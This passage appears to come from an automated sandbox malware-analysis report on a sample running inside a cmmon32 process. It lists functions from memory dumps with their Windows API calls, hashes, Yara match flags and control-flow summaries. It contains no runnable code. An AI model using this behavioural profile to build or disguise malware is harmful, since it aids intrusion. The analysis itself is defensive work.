                                                          • Opcode ID: 1cb0ad745fa17a6b0f92d1251f92e59420b1dcb8c70dd00eb84f7822971f7938
                                                          • Instruction ID: 56cfed005245353e5a427b1386e1e92ce73552332cb1e46eff3ca89e070dbfef
                                                          • Opcode Fuzzy Hash: 1cb0ad745fa17a6b0f92d1251f92e59420b1dcb8c70dd00eb84f7822971f7938
                                                          • Instruction Fuzzy Hash: ADF0B7B2200209AFCB18DF89DC90EEB77ADEF8C754F158248BE1D97241D630E811CBA0
                                                          Function 02CAA530 Relevance: 1.5, APIs: 1, Instructions: 30memorynativeCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • NtAllocateVirtualMemory.NTDLL(00000004,00003000,00002000,00000000,?,02C92D11,00002000,00003000,00000004), ref: 02CAA569
                                                          Memory Dump Source
                                                          • Source File: 0000000E.00000002.3716442630.0000000002C90000.00000040.80000000.00040000.00000000.sdmp, Offset: 02C90000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_14_2_2c90000_cmmon32.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: AllocateMemoryVirtual
                                                          • String ID:
                                                          • API String ID: 2167126740-0
                                                          • Opcode ID: e868ca870ba9ad3aee1a8e1804f154c56992d5df3b6804a08460a29a32ddb2bb
                                                          • Instruction ID: cdf54913837b1507a6b74950451447b6a1cd029a776d81c1998d9cd86d89c1e4
                                                          • Opcode Fuzzy Hash: e868ca870ba9ad3aee1a8e1804f154c56992d5df3b6804a08460a29a32ddb2bb
                                                          • Instruction Fuzzy Hash: FBF015B2200209AFCB18DF89CC80EAB77ADAF88754F118148BE1C97241C630F810CBA0
                                                          Function 02CAA47C Relevance: 1.5, APIs: 1, Instructions: 22nativeCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • NtClose.NTDLL(02CA4D40,?,?,02CA4D40,00000000,FFFFFFFF), ref: 02CAA4A5
                                                          Memory Dump Source
                                                          • Source File: 0000000E.00000002.3716442630.0000000002C90000.00000040.80000000.00040000.00000000.sdmp, Offset: 02C90000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_14_2_2c90000_cmmon32.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: Close
                                                          • String ID:
                                                          • API String ID: 3535843008-0
                                                          • Opcode ID: 79370c38985f3ec32e2718c92d707d0d3efe6922f56ad0a9f2dcd0028b008108
                                                          • Instruction ID: a2d1e446dcf28b205f9ddefd2b6f64010207b230a898209a556c8a5bb6dd8540
                                                          • Opcode Fuzzy Hash: 79370c38985f3ec32e2718c92d707d0d3efe6922f56ad0a9f2dcd0028b008108
                                                          • Instruction Fuzzy Hash: 51E0C2762002006FDB10EFD8CC84ED77B69EF48710F104254BA1C9B341C531E60087D0
                                                          Function 02CAA480 Relevance: 1.5, APIs: 1, Instructions: 20nativeCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • NtClose.NTDLL(02CA4D40,?,?,02CA4D40,00000000,FFFFFFFF), ref: 02CAA4A5
                                                          Memory Dump Source
                                                          • Source File: 0000000E.00000002.3716442630.0000000002C90000.00000040.80000000.00040000.00000000.sdmp, Offset: 02C90000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_14_2_2c90000_cmmon32.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: Close
                                                          • String ID:
                                                          • API String ID: 3535843008-0
                                                          • Opcode ID: aa41620b67aec822f8463caeb84bd84f714cc802f2fd34de09a1d76353dd2617
                                                          • Instruction ID: 4939596462545ad0386e7a1db4521ddb8906f4c2de7546f25ab3ddb0e7b447dc
                                                          • Opcode Fuzzy Hash: aa41620b67aec822f8463caeb84bd84f714cc802f2fd34de09a1d76353dd2617
                                                          • Instruction Fuzzy Hash: 82D01776200214ABD714EB98CC85EA77BADEF48764F154499BA1C9B242C530FA008AE0
                                                          Function 04C32CA0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 0000000E.00000002.3734185638.0000000004BC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04BC0000, based on PE: true
                                                          • Associated: 0000000E.00000002.3734185638.0000000004CE9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000E.00000002.3734185638.0000000004CED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000E.00000002.3734185638.0000000004D5E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_14_2_4bc0000_cmmon32.jbxd
                                                          Similarity
                                                          • API ID: InitializeThunk
                                                          • String ID:
                                                          • API String ID: 2994545307-0
                                                          • Opcode ID: 23bf6c7d7f496069535c9d57ed62d3ff7584ecdd7142246915988493e1fa8ff3
                                                          • Instruction ID: e16df53cec10fc63bb4b2cb693f6bad40122169634ccf792dd0be43d0787de97
                                                          • Opcode Fuzzy Hash: 23bf6c7d7f496069535c9d57ed62d3ff7584ecdd7142246915988493e1fa8ff3
                                                          • Instruction Fuzzy Hash: 5290027520140402F1007598550864600068BE0705F55D021A5025559EC6A5D9916131
                                                          Function 04C32C60 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 0000000E.00000002.3734185638.0000000004BC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04BC0000, based on PE: true
                                                          • Associated: 0000000E.00000002.3734185638.0000000004CE9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000E.00000002.3734185638.0000000004CED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000E.00000002.3734185638.0000000004D5E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_14_2_4bc0000_cmmon32.jbxd
                                                          Similarity
                                                          • API ID: InitializeThunk
                                                          • String ID:
                                                          • API String ID: 2994545307-0
                                                          • Opcode ID: a3ce94d125e2c067ce15edeff91c189fe358927174582467d8ce8e79ddd7f750
                                                          • Instruction ID: 3e13a9a4ca773282c7825ea56f9356923934e1cd761b633f2b6f8412d8b1e541
                                                          • Opcode Fuzzy Hash: a3ce94d125e2c067ce15edeff91c189fe358927174582467d8ce8e79ddd7f750
                                                          • Instruction Fuzzy Hash: 4E90027520140842F10071584504B4600068BE0705F55C026A0125658DC655D9517531
                                                          Function 04C32C70 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                          Download Yara Rule
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 0000000E.00000002.3734185638.0000000004BC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04BC0000, based on PE: true
                                                          • Associated: 0000000E.00000002.3734185638.0000000004CE9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000E.00000002.3734185638.0000000004CED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000E.00000002.3734185638.0000000004D5E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_14_2_4bc0000_cmmon32.jbxd
                                                          Similarity
                                                          • API ID: InitializeThunk
                                                          • String ID:
                                                          • API String ID: 2994545307-0
                                                          • Opcode ID: 2a2e1410e1c8e2810d1a7316184b52e8972e189691240e607ad84c2fa2ee0ec5
                                                          • Instruction ID: 11bda11a25d94b0e0447ac1290211e20711919c3acfab92c88f5ef51748c1a22
                                                          • Opcode Fuzzy Hash: 2a2e1410e1c8e2810d1a7316184b52e8972e189691240e607ad84c2fa2ee0ec5
                                                          • Instruction Fuzzy Hash: 2F90027520148802F1107158850474A00068BD0705F59C421A442565CDC6D5D9917131
                                                          Function 04C32DD0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 0000000E.00000002.3734185638.0000000004BC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04BC0000, based on PE: true
                                                          • Associated: 0000000E.00000002.3734185638.0000000004CE9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000E.00000002.3734185638.0000000004CED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000E.00000002.3734185638.0000000004D5E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_14_2_4bc0000_cmmon32.jbxd
                                                          Similarity
                                                          • API ID: InitializeThunk
                                                          • String ID:
                                                          • API String ID: 2994545307-0
                                                          • Opcode ID: 329c410d03c64e8d4ff06491b8f238d913c49fe6361e3661b975d00a7c68740f
                                                          • Instruction ID: c7b518450014c63785e686783041b49874e426ab89406a99abdd62c211a19648
                                                          • Opcode Fuzzy Hash: 329c410d03c64e8d4ff06491b8f238d913c49fe6361e3661b975d00a7c68740f
                                                          • Instruction Fuzzy Hash: 96900265242441527545B158450450740079BE0645795C022A1415954CC566E956D631
                                                          Function 04C32DF0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                          Download Yara Rule
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 0000000E.00000002.3734185638.0000000004BC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04BC0000, based on PE: true
                                                          • Associated: 0000000E.00000002.3734185638.0000000004CE9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000E.00000002.3734185638.0000000004CED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000E.00000002.3734185638.0000000004D5E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_14_2_4bc0000_cmmon32.jbxd
                                                          Similarity
                                                          • API ID: InitializeThunk
                                                          • String ID:
                                                          • API String ID: 2994545307-0
                                                          • Opcode ID: 1c73cba9feb1763c698796f0c4371824a5b1daae13b2d12a4b6ec603498de6f8
                                                          • Instruction ID: 52703ab9c6b662eb01810a9a8f59df90cec6f73788c9ab944a6af9ca9be2bbbb
                                                          • Opcode Fuzzy Hash: 1c73cba9feb1763c698796f0c4371824a5b1daae13b2d12a4b6ec603498de6f8
                                                          • Instruction Fuzzy Hash: 5890027520140413F11171584604707000A8BD0645F95C422A042555CDD696DA52A131
                                                          Function 04C32D10 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                          Download Yara Rule
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 0000000E.00000002.3734185638.0000000004BC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04BC0000, based on PE: true
                                                          • Associated: 0000000E.00000002.3734185638.0000000004CE9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000E.00000002.3734185638.0000000004CED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000E.00000002.3734185638.0000000004D5E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_14_2_4bc0000_cmmon32.jbxd
                                                          Similarity
                                                          • API ID: InitializeThunk
                                                          • String ID:
                                                          • API String ID: 2994545307-0
                                                          • Opcode ID: 31decd8780ef4d69579661a35260892d6ca098fe985f41cd9bdccd88cb41e6df
                                                          • Instruction ID: 7c3f549fbd05ca8fb460a49538c179c98fad90d81e4920d7cd46d373d5ab15ee
                                                          • Opcode Fuzzy Hash: 31decd8780ef4d69579661a35260892d6ca098fe985f41cd9bdccd88cb41e6df
                                                          • Instruction Fuzzy Hash: C490026D21340002F1807158550860A00068BD1606F95D425A001655CCC955D9695331
                                                          Function 04C32EA0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 0000000E.00000002.3734185638.0000000004BC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04BC0000, based on PE: true
                                                          • Associated: 0000000E.00000002.3734185638.0000000004CE9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000E.00000002.3734185638.0000000004CED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000E.00000002.3734185638.0000000004D5E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_14_2_4bc0000_cmmon32.jbxd
                                                          Similarity
                                                          • API ID: InitializeThunk
                                                          • String ID:
                                                          • API String ID: 2994545307-0
                                                          • Opcode ID: 001bfc63a87c3bd6a4cd16928dcf267efbd202b629b1eba4df2ad633b6f32629
                                                          • Instruction ID: f36322e48c1ed264d7a62488399bce9d7744f35e1ede734668cc99949dd27e45
                                                          • Opcode Fuzzy Hash: 001bfc63a87c3bd6a4cd16928dcf267efbd202b629b1eba4df2ad633b6f32629
                                                          • Instruction Fuzzy Hash: B39002B520140402F1407158450474600068BD0705F55C021A5065558EC699DED56675
                                                          Function 04C32FE0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 0000000E.00000002.3734185638.0000000004BC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04BC0000, based on PE: true
                                                          • Associated: 0000000E.00000002.3734185638.0000000004CE9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000E.00000002.3734185638.0000000004CED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000E.00000002.3734185638.0000000004D5E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_14_2_4bc0000_cmmon32.jbxd
                                                          Similarity
                                                          • API ID: InitializeThunk
                                                          • String ID:
                                                          • API String ID: 2994545307-0
                                                          • Opcode ID: d14df695a4ca0545634c1e0f05c60b0d5cd1182a3bdfd9dcc889a8ef0a3bc10c
                                                          • Instruction ID: 465860587a0f3b166de841da3e12743adf20f066b3c70353bb3b4600ad3cd175
                                                          • Opcode Fuzzy Hash: d14df695a4ca0545634c1e0f05c60b0d5cd1182a3bdfd9dcc889a8ef0a3bc10c
                                                          • Instruction Fuzzy Hash: A6900265211C0042F20075684D14B0700068BD0707F55C125A0155558CC955D9615531
                                                          Function 04C32F30 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                          Download Yara Rule
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 0000000E.00000002.3734185638.0000000004BC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04BC0000, based on PE: true
                                                          • Associated: 0000000E.00000002.3734185638.0000000004CE9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000E.00000002.3734185638.0000000004CED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000E.00000002.3734185638.0000000004D5E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_14_2_4bc0000_cmmon32.jbxd
                                                          Similarity
                                                          • API ID: InitializeThunk
                                                          • String ID:
                                                          • API String ID: 2994545307-0
                                                          • Opcode ID: 72621a0392e3b77ac7d428b8d1c50a76d6d998bb5c0ad0776bc551af4439a0b0
                                                          • Instruction ID: c74035c3d4773385f187194a1aaaf79254ce9e583abc4525d6ef431fe909039e
                                                          • Opcode Fuzzy Hash: 72621a0392e3b77ac7d428b8d1c50a76d6d998bb5c0ad0776bc551af4439a0b0
                                                          • Instruction Fuzzy Hash: E79002A534140442F10071584514B060006CBE1705F55C025E1065558DC659DD526136
                                                          Function 04C32AD0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 0000000E.00000002.3734185638.0000000004BC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04BC0000, based on PE: true
                                                          • Associated: 0000000E.00000002.3734185638.0000000004CE9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000E.00000002.3734185638.0000000004CED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000E.00000002.3734185638.0000000004D5E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_14_2_4bc0000_cmmon32.jbxd
                                                          Similarity
                                                          • API ID: InitializeThunk
                                                          • String ID:
                                                          • API String ID: 2994545307-0
                                                          • Opcode ID: e3d26702903301adddcba5fd48c5a74837b46c386739842c0afab8293175ba0d
                                                          • Instruction ID: b404d9d371bec9a6521cd542f6f8f22ada8f9d03de379d23b397c776167f1db6
                                                          • Opcode Fuzzy Hash: e3d26702903301adddcba5fd48c5a74837b46c386739842c0afab8293175ba0d
                                                          • Instruction Fuzzy Hash: 5390047D311400033105F55C07045070047CFD5755355C031F1017554CD771DD715131
                                                          Function 04C32BE0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 0000000E.00000002.3734185638.0000000004BC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04BC0000, based on PE: true
                                                          • Associated: 0000000E.00000002.3734185638.0000000004CE9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000E.00000002.3734185638.0000000004CED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000E.00000002.3734185638.0000000004D5E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_14_2_4bc0000_cmmon32.jbxd
                                                          Similarity
                                                          • API ID: InitializeThunk
                                                          • String ID:
                                                          • API String ID: 2994545307-0
                                                          • Opcode ID: af5efb56e4cb7db450b493ec28e1757f3b13a2f48146e06d05bfd83eed98761b
                                                          • Instruction ID: 6aed2ca745519dafe062b53e6e251c8c987358d8d29e4ef72366d719e65ecdc9
                                                          • Opcode Fuzzy Hash: af5efb56e4cb7db450b493ec28e1757f3b13a2f48146e06d05bfd83eed98761b
                                                          • Instruction Fuzzy Hash: 1E90027520544842F14071584504A4600168BD0709F55C021A0065698DD665DE55B671
                                                          Function 04C32BF0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                          Download Yara Rule
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 0000000E.00000002.3734185638.0000000004BC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04BC0000, based on PE: true
                                                          • Associated: 0000000E.00000002.3734185638.0000000004CE9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000E.00000002.3734185638.0000000004CED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000E.00000002.3734185638.0000000004D5E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_14_2_4bc0000_cmmon32.jbxd
                                                          Similarity
                                                          • API ID: InitializeThunk
                                                          • String ID:
                                                          • API String ID: 2994545307-0
                                                          • Opcode ID: cdd9f416e8f724003841979f6b1c4c208d66e18121f9e01de90d618872115f93
                                                          • Instruction ID: de37929e4002873ff7d5a8ded0d98fbe4e648c5b1db844c1305608b5b1cf057f
                                                          • Opcode Fuzzy Hash: cdd9f416e8f724003841979f6b1c4c208d66e18121f9e01de90d618872115f93
                                                          • Instruction Fuzzy Hash: FB90027520140802F1807158450464A00068BD1705F95C025A0026658DCA55DB5977B1
                                                          Function 04C32B60 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                          Download Yara Rule
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 0000000E.00000002.3734185638.0000000004BC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04BC0000, based on PE: true
                                                          • Associated: 0000000E.00000002.3734185638.0000000004CE9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000E.00000002.3734185638.0000000004CED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000E.00000002.3734185638.0000000004D5E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_14_2_4bc0000_cmmon32.jbxd
                                                          Similarity
                                                          • API ID: InitializeThunk
                                                          • String ID:
                                                          • API String ID: 2994545307-0
                                                          • Opcode ID: 46e3ad2ecd87af3389427cced1ca01766b2abe9d11b8133ce8d666e8ec04a32c
                                                          • Instruction ID: e14c165f568f1d3fc59ed922a233ea4759dc2a86a29c20bbca6585710b814627
                                                          • Opcode Fuzzy Hash: 46e3ad2ecd87af3389427cced1ca01766b2abe9d11b8133ce8d666e8ec04a32c
                                                          • Instruction Fuzzy Hash: 959002A520240003610571584514616400B8BE0605B55C031E1015594DC565D9916135
                                                          Function 04C335C0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 0000000E.00000002.3734185638.0000000004BC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04BC0000, based on PE: true
                                                          • Associated: 0000000E.00000002.3734185638.0000000004CE9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000E.00000002.3734185638.0000000004CED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000E.00000002.3734185638.0000000004D5E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_14_2_4bc0000_cmmon32.jbxd
                                                          Similarity
                                                          • API ID: InitializeThunk
                                                          • String ID:
                                                          • API String ID: 2994545307-0
                                                          • Opcode ID: 11283085a26de73d7da4128e0896d153d262d0955ba8bfee0e01aacd5461fa71
                                                          • Instruction ID: 5cd824c81accc05b5519f7ceaaf25114a7dfdfa724575f39484c6cebe58a00e9
                                                          • Opcode Fuzzy Hash: 11283085a26de73d7da4128e0896d153d262d0955ba8bfee0e01aacd5461fa71
                                                          • Instruction Fuzzy Hash: F990027560550402F1007158461470610068BD0605F65C421A042556CDC7D5DA5165B2
                                                          Function 02CA9070 Relevance: 4.6, APIs: 1, Strings: 2, Instructions: 90sleepCOMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 500 2ca9070-2ca90b2 call 2cabd30 503 2ca90b8-2ca9108 call 2cabe00 call 2c9ace0 call 2ca4e40 500->503 504 2ca918c-2ca9192 500->504 511 2ca9110-2ca9121 Sleep 503->511 512 2ca9123-2ca9129 511->512 513 2ca9186-2ca918a 511->513 514 2ca912b-2ca9151 call 2ca8c90 512->514 515 2ca9153-2ca9173 512->515 513->504 513->511 516 2ca9179-2ca917c 514->516 515->516 517 2ca9174 call 2ca8ea0 515->517 516->513 517->516
                                                          APIs
                                                          • Sleep.KERNELBASE(000007D0), ref: 02CA9118
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 0000000E.00000002.3716442630.0000000002C90000.00000040.80000000.00040000.00000000.sdmp, Offset: 02C90000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_14_2_2c90000_cmmon32.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: Sleep
                                                          • String ID: net.dll$wininet.dll
                                                          • API String ID: 3472027048-1269752229
                                                          • Opcode ID: 4ed7dba718d4673b5d47752fdb7b5f00bd3c950a8118c2bc15652b3783fcf2b9
                                                          • Instruction ID: b73a361c0c32b16553978379e23d2139043f06a8f2ab57c89f38a0c10b1647db
                                                          • Opcode Fuzzy Hash: 4ed7dba718d4673b5d47752fdb7b5f00bd3c950a8118c2bc15652b3783fcf2b9
                                                          • Instruction Fuzzy Hash: DF31C1B2940745BBC724DF64CC99FA7B7B9BB88B04F10851DF62A5B244D730A610CBA4
                                                          Function 02CA9067 Relevance: 4.6, APIs: 1, Strings: 2, Instructions: 85sleepCOMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 520 2ca9067-2ca90b2 call 2cabd30 524 2ca90b8-2ca9108 call 2cabe00 call 2c9ace0 call 2ca4e40 520->524 525 2ca918c-2ca9192 520->525 532 2ca9110-2ca9121 Sleep 524->532 533 2ca9123-2ca9129 532->533 534 2ca9186-2ca918a 532->534 535 2ca912b-2ca9151 call 2ca8c90 533->535 536 2ca9153-2ca9173 533->536 534->525 534->532 537 2ca9179-2ca917c 535->537 536->537 538 2ca9174 call 2ca8ea0 536->538 537->534 538->537
                                                          APIs
                                                          • Sleep.KERNELBASE(000007D0), ref: 02CA9118
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 0000000E.00000002.3716442630.0000000002C90000.00000040.80000000.00040000.00000000.sdmp, Offset: 02C90000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_14_2_2c90000_cmmon32.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: Sleep
                                                          • String ID: net.dll$wininet.dll
                                                          • API String ID: 3472027048-1269752229
                                                          • Opcode ID: c277475f4c6df1e13ba2662b4c6efc1687009c60f37c66c54771d9c627c70cf4
                                                          • Instruction ID: ffa1ac76c00cca40c3a626852b2fa3bbfb2da17d9f2d8ff91256eb390dd07f78
                                                          • Opcode Fuzzy Hash: c277475f4c6df1e13ba2662b4c6efc1687009c60f37c66c54771d9c627c70cf4
                                                          • Instruction Fuzzy Hash: B031D2B2A40346BBC714DF64CC9AFA7B7B4AB88708F10802DE6299B245D770A550CBA4
                                                          Function 02CAA660 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 24memoryCOMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 668 2caa660-2caa691 call 2caaf50 RtlFreeHeap
                                                          APIs
                                                          • RtlFreeHeap.NTDLL(00000060,00000000,.z`,007A002E,00000000,00000060,00000000,00000000,?,?,00700069,?,02C93AF8), ref: 02CAA68D
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 0000000E.00000002.3716442630.0000000002C90000.00000040.80000000.00040000.00000000.sdmp, Offset: 02C90000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_14_2_2c90000_cmmon32.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: FreeHeap
                                                          • String ID: .z`
                                                          • API String ID: 3298025750-1441809116
                                                          • Opcode ID: 540c4433df045b48126259b9153db85e530e9dd1f040c1eb84158749b6bc4ef9
                                                          • Instruction ID: 1d10ea5f46e1cd9fcdd7dd10a426a0357055ea7487d25ee4f5c489c7be66b54c
                                                          • Opcode Fuzzy Hash: 540c4433df045b48126259b9153db85e530e9dd1f040c1eb84158749b6bc4ef9
                                                          • Instruction Fuzzy Hash: 41E012B2200209ABDB18EF99CC48EA777ADAF88754F018558BA1C5B241C631E910CAB0
                                                          Function 02C98308 Relevance: 3.1, APIs: 2, Instructions: 58threadwindowCOMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          APIs
                                                          • PostThreadMessageW.USER32(0065002E,00000111,00000000,00000000,00000000), ref: 02C9836A
                                                          • PostThreadMessageW.USER32(0065002E,00008003,00000000,?,00000000), ref: 02C9838B
                                                          Memory Dump Source
                                                          • Source File: 0000000E.00000002.3716442630.0000000002C90000.00000040.80000000.00040000.00000000.sdmp, Offset: 02C90000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_14_2_2c90000_cmmon32.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: MessagePostThread
                                                          • String ID:
                                                          • API String ID: 1836367815-0
                                                          • Opcode ID: 57b7eea0f59536da0e637285a7ad7642ed3c4b69922504b76f1cacf9458e19ee
                                                          • Instruction ID: df90e8f34a5a7e4b8950ce0b65258f61e374fdc951872b1689159747f0a65be0
                                                          • Opcode Fuzzy Hash: 57b7eea0f59536da0e637285a7ad7642ed3c4b69922504b76f1cacf9458e19ee
                                                          • Instruction Fuzzy Hash: 1201DD31A802197BEB20A6948C02FFF776D6F41B54F144119FF04BB1C1D7A46A054BF5
                                                          Function 02C98310 Relevance: 3.1, APIs: 2, Instructions: 55threadwindowCOMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 686 2c98310-2c9831f 687 2c98328-2c9835a call 2cac9f0 call 2c9ace0 call 2ca4e40 686->687 688 2c98323 call 2cabe50 686->688 695 2c9835c-2c9836e PostThreadMessageW 687->695 696 2c9838e-2c98392 687->696 688->687 697 2c9838d 695->697 698 2c98370-2c9838b call 2c9a470 PostThreadMessageW 695->698 697->696 698->697
                                                          APIs
                                                          • PostThreadMessageW.USER32(0065002E,00000111,00000000,00000000,00000000), ref: 02C9836A
                                                          • PostThreadMessageW.USER32(0065002E,00008003,00000000,?,00000000), ref: 02C9838B
                                                          Memory Dump Source
                                                          • Source File: 0000000E.00000002.3716442630.0000000002C90000.00000040.80000000.00040000.00000000.sdmp, Offset: 02C90000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_14_2_2c90000_cmmon32.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: MessagePostThread
                                                          • String ID:
